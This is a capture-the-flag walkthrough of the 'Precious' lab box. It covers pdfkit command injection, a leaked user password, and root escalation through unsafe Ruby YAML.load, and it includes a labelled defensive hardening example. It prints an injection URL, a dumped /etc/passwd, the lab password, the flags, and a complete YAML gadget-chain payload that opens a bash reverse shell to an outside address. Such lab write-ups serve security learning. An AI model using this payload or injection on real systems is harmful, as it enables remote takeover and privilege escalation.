Precious

Attempting to exploit wkhtmltopdf
Finding wkhtmltopdf
Exploits
- https://www.virtuesecurity.com/kb/wkhtmltopdf-file-inclusion-vulnerability-2/ SSRF LFI
That actually might be misleading, because I spent 15 minutes trying to get it to LFI or SSRF but was unsuccessful.
exiftool
exiftool exploit.pdf
ExifTool Version Number : 12.16
File Name : exploit.pdf
Directory : .
File Size : 11 KiB
File Modification Date/Time : 2023:02:27 16:58:36-06:00
File Access Date/Time : 2023:02:27 16:58:36-06:00
File Inode Change Date/Time : 2023:02:27 16:58:36-06:00
File Permissions : rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.4
Linearized : No
Page Count : 1
Creator : Generated by pdfkit v0.8.6
Finding pdfkit v0.8.6
nmap
pdfkit
Finding pdfkit
Downloading and scanning the pdf
Exploiting pdfkit
- https://github.com/shamo0/PDFkit-CMD-Injection
- https://security.snyk.io/vuln/SNYK-RUBY-PDFKIT-2869795 Explains better
whoami
Request URL: http://10.10.14.92/?name=%20`whoami'

/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:109::/nonexistent:/usr/sbin/nologin
sshd:x:104:65534::/run/sshd:/usr/sbin/nologin
henry:x:1000:1000:henry,,,:/home/henry:/bin/bash
systemd-timesync:x:999:999:systemd Time Synchronization:/:/usr/sbin/nologin
systemd-coredump:x:998:998:systemd Core Dumper:/:/usr/sbin/nologin
ruby:x:1001:1001::/home/ruby:/bin/bash
_laurel:x:997:997::/var/log/laurel:/bin/false
We have RCE!
LinEnum
Foothold
Reverse Shell
Using a base64-encoded shell, I was able to get TTY access as the user ruby.

User Henry Escalation
Finding the ~/.bundle/config really was just lazy sleuthing. I ran LinEnum.sh, but it didn't jump out at me, so I went back to browsing around.
In the file is henry's password: Q3c1AqGHtoI0aXAYFH

Root Escalation
So henry has sudo access to run the update-dependencies.rb script in the /opt directory.

Here is what that file looks like:
# Compare installed dependencies with those specified in "dependencies.yml"
require "yaml"
require 'rubygems'

# TODO: update versions automatically
def update_gems()
end

def list_from_file
  YAML.load(File.read("dependencies.yml"))
end

def list_local_gems
  Gem::Specification.sort_by{ |g| [g.name.downcase, g.version] }.map{|g| [g.name, g.version.to_s]}
end

gems_file = list_from_file
gems_local = list_local_gems

gems_file.each do |file_name, file_version|
  gems_local.each do |local_name, local_version|
    if(file_name == local_name)
      if(file_version != local_version)
        puts "Installed version differs from the one specified in file: " + local_name
      else
        puts "Installed version is equals to the one specified in file: " + local_name
      end
    end
  end
end
This Ruby script compares the gems installed on the system with the dependencies listed in a YAML file called dependencies.yml. It reads that file with YAML.load() and lists the locally installed gems through Gem::Specification. Two details matter here: the path dependencies.yml is relative, so the script reads it from whatever directory it is run in, and YAML.load (unlike YAML.safe_load) instantiates whatever Ruby classes the document names with !ruby/object tags in the Psych versions that shipped before Ruby 3.1.
The script then loops through each dependency in the YAML file and checks whether an installed gem of the same name exists. If one does, it compares the version from the file with the installed version and prints whether the two differ or match.
The update_gems() method is empty and marked as a TODO, so automatic updating is not implemented. Overall, the script is a simple tool for checking that the required gem versions are installed on the system.
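As an added defensive example (not code from the box or from this writeup), here is the script's loader next to a hardened replacement: a fixed file path instead of the current directory, YAML.safe_load so that object tags are refused, and a check that the result is a mapping of gem name to version string. DEPENDENCIES_PATH and the two sample documents are assumptions constructed for the example.

```ruby
require "yaml"

# Assumed hardened location: root-owned, not writable by the sudo user.
DEPENDENCIES_PATH = "/opt/dependencies.yml".freeze

# Constructed sample: what the file is supposed to contain (versions quoted
# so they parse as strings rather than floats).
GOOD_YAML = <<~YAML
  rails: "7.0.4"
  nokogiri: "1.14.2"
YAML

# Constructed sample: a document carrying a Ruby object tag. With the Psych
# versions that shipped before Ruby 3.1, YAML.load instantiates the tagged
# class; a benign tag is enough to show how the safe loader reacts to it.
TAGGED_YAML = <<~YAML
  - !ruby/object:Object {}
YAML

# Pattern from the script: relative path (resolved against the caller's
# working directory) plus the permissive loader.
def list_from_file_vulnerable
  YAML.load(File.read("dependencies.yml"))
end

# safe_load only builds scalars, arrays and hashes; any !ruby/object tag
# raises Psych::DisallowedClass. The shape check then rejects anything
# that is not a mapping of gem name => version string.
def parse_dependencies(yaml_text)
  data = YAML.safe_load(yaml_text, permitted_classes: [], aliases: false)
  raise ArgumentError, "expected gem name => version mapping" unless data.is_a?(Hash)
  data.each do |name, version|
    ok = name.is_a?(String) && version.is_a?(String) && name.match?(/\A[A-Za-z0-9_.-]+\z/)
    raise ArgumentError, "bad dependency entry: #{name.inspect}" unless ok
  end
  data
end

# Hardened replacement for list_from_file: fixed path, safe parser.
def list_from_file_hardened(path = DEPENDENCIES_PATH)
  parse_dependencies(File.read(path))
end

# Returns the parsed mapping, or :rejected when the loader refuses the input.
def safe_parse_result(yaml_text)
  parse_dependencies(yaml_text)
rescue Psych::DisallowedClass, Psych::BadAlias, ArgumentError
  :rejected
end
```

With the safe loader, a document that names Ruby classes never gets as far as object construction, so the gadget chain used in the next section has nothing to build on.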
Exploiting RCE through YAML Deserialization
I found some interesting information about YAML deserialization:
- https://staaldraad.github.io/post/2019-03-02-universal-rce-ruby-yaml-load/
- https://snyk.io/blog/unsafe-deserialization-snakeyaml-java-cve-2022-1471/
- https://blog.stratumsecurity.com/2021/06/09/blind-remote-code-execution-through-yaml-deserialization/ Used example
So I believe we have a way to execute the update-dependencies.rb script and obtain a root shell.
I create ~/dependencies.yml with this content:
---
- !ruby/object:Gem::Installer
    i: x
- !ruby/object:Gem::SpecFetcher
    i: y
- !ruby/object:Gem::Requirement
  requirements:
    !ruby/object:Gem::Package::TarReader
    io: &1 !ruby/object:Net::BufferedIO
      io: &1 !ruby/object:Gem::Package::TarReader::Entry
         read: 0
         header: "abc"
      debug_output: &1 !ruby/object:Net::WriteAdapter
         socket: &1 !ruby/object:Gem::RequestSet
             sets: !ruby/object:Net::WriteAdapter
                 socket: !ruby/module 'Kernel'
                 method_id: :system
             git_set: "bash -c 'bash -i >& /dev/tcp/10.10.14.92/9000 0>&1'"
         method_id: :resolve
Execute update-dependencies.rb

Flags
User Flag
46b75bc5ff26307936687ed60967bd9e
Root Flag
f12dc32af9468ad774222a52228ac553